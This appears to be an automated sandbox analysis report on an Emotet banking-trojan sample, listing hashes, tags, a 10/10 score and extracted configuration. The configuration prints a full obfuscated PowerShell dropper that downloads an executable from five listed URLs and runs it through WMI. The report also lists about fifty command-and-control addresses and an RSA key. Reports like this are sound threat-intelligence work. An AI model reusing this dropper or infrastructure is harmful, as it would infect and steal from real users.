SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

General
Target

SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

Completed

01-08-2020 19:52

Sample

200801-aht4rn3ree

SHA256

dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b

Score
10 /10
Malware Config

Extracted

Language ps1
Source $TUOOFjjd='JEOUSdek';[Net.ServicePointManager]::"S`ECURityP`RoToCOl" = 'tls12, tls11, tls';$CUZQZtya = '285';$NIBCCosv='JOFKHpto';$GGMBQbyi=$env:userprofile+'\'+$CUZQZtya+'.exe';$SBCSMfod='IBVLOmpn';$NWDGLxro=.('new'+'-obj'+'ect') Net.WEbclIEnT;$OZDAKgvp='http://rectificadoscarrion.com/wp-includes/EiQ/*http://renekok.com/QbWyat/*http://www.onlinemediadesigns.com/bin/nObh/*http://renegaderadio.net/haunted/cA5zuC5/*http://qatifsport.net/t/NbQq254/'."sp`lIt"([char]42);$SSMANocu='DTGFZpas';foreach($ZNZIIini in $OZDAKgvp){try{$NWDGLxro."DOwn`l`O`AdfIle"($ZNZIIini, $GGMBQbyi);$FVVVNykk='KXATUueb';If ((&('G'+'et-Ite'+'m') $GGMBQbyi)."lE`NgTH" -ge 36957) {([wmiclass]'win32_Process')."CR`ea`TE"($GGMBQbyi);$SNOQSykj='CCGLVgks';break;$WEOPDvrx='KYMAXtja'}}catch{}}$QFDWDonh='EMENKbqf'
URLs
exe.dropper

http://rectificadoscarrion.com/wp-includes/EiQ/

exe.dropper

http://renekok.com/QbWyat/

exe.dropper

http://www.onlinemediadesigns.com/bin/nObh/

exe.dropper

http://renegaderadio.net/haunted/cA5zuC5/

exe.dropper

http://qatifsport.net/t/NbQq254/

Related Tasks

behavioral1behavioral2

Extracted

Family emotet
C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

50.28.51.143:8080

172.104.169.32:8080

192.241.146.84:8080

82.240.207.95:443

80.249.176.206:80

2.47.112.152:80

212.231.60.98:80

77.55.211.77:8080

170.81.48.2:80

5.196.35.138:7080

143.0.87.101:80

190.6.193.152:8080

217.199.160.224:7080

187.162.248.237:80

93.151.186.85:80

177.74.228.34:80

204.225.249.100:7080

217.13.106.14:8080

51.255.165.160:8080

104.131.103.37:8080

177.72.13.80:80

190.163.31.26:80

186.70.127.199:8090

61.92.159.208:8080

12.162.84.2:8080

71.50.31.38:80

186.250.52.226:8080

92.23.34.86:80

177.144.135.2:80

201.213.156.176:80

rsa_pubkey.plain
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6 uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz 6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB -----END PUBLIC KEY-----

Related Tasks

behavioral1behavioral2
Targets
Target

SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

MD5

a218719fd104a4c006280fed89268170

Filesize

168KB

Score
10 /10
SHA1

4a14ff4ab8445b69e5ad1960236a0c4c4b583d6e

SHA256

dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b

SHA512

99b11414943e18e955451b3f7058564b88e4abb5baa79975a98dd4471826de49cb714854a32c6ca54794229e0712a0b387fb59cd98085ee3b51a25f19c04d041

Tags

trojan banker emotet

Related Tasks